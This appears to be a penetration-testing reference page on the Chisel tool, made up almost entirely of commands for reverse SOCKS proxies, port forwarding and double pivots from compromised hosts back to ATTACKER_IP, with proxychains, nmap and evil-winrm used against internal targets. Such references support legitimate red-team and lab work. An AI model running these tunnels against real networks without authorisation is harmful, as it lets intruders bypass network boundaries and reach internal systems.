> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Chisel

> Chisel TCP tunneling: reverse SOCKS proxy, port forwarding, and pivoting through compromised hosts.

## Download

```bash theme={"dark"}
# Releases
# https://github.com/jpillora/chisel/releases

# Match target architecture
chisel_linux_amd64
chisel_windows_amd64.exe
chisel_linux_arm64
```

***

## Reverse SOCKS Proxy

### Attacker (Server)

```bash theme={"dark"}
chisel server -p 8000 --reverse
```

### Target (Client)

```bash theme={"dark"}
./chisel client ATTACKER_IP:8000 R:socks
```

SOCKS5 proxy available on attacker at `127.0.0.1:1080`.

### Use with ProxyChains

```bash theme={"dark"}
# /etc/proxychains4.conf
socks5 127.0.0.1 1080
```

```bash theme={"dark"}
proxychains nmap -sT -p 80,445 INTERNAL_TARGET
proxychains evil-winrm -i INTERNAL_TARGET -u user -p pass
```

***

## Forward SOCKS Proxy

### Target (Server)

```bash theme={"dark"}
./chisel server -p 8000 --socks5
```

### Attacker (Client)

```bash theme={"dark"}
chisel client TARGET:8000 socks
```

***

## Port Forwarding

### Remote Port Forward

Expose internal service to attacker.

```bash theme={"dark"}
# Attacker
chisel server -p 8000 --reverse

# Target
./chisel client ATTACKER_IP:8000 R:8888:INTERNAL_IP:80
```

Access `http://127.0.0.1:8888` on attacker → reaches `INTERNAL_IP:80`.

### Local Port Forward

```bash theme={"dark"}
# Target
./chisel server -p 8000

# Attacker
chisel client TARGET:8000 9999:127.0.0.1:3306
```

Access `127.0.0.1:9999` on attacker → reaches target's local MySQL.

***

## Multiple Tunnels

```bash theme={"dark"}
./chisel client ATTACKER_IP:8000 R:socks R:8888:10.10.10.5:80 R:9999:10.10.10.5:445
```

***

## Double Pivot

```bash theme={"dark"}
# Attacker → Host1 → Host2

# Attacker
chisel server -p 8000 --reverse

# Host1
./chisel client ATTACKER_IP:8000 R:1080:socks
./chisel server -p 9000 --reverse

# Host2
./chisel client HOST1_IP:9000 R:1081:socks
```

Configure proxychains with chain:

```
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081
```

***

## Quick Reference

| Task          | Command                                                                             |
| ------------- | ----------------------------------------------------------------------------------- |
| Reverse SOCKS | Server: `chisel server -p 8000 --reverse` / Client: `chisel client IP:8000 R:socks` |
| Port forward  | Client: `chisel client IP:8000 R:LOCAL:REMOTE_IP:REMOTE_PORT`                       |
| SOCKS port    | Default `127.0.0.1:1080`                                                            |
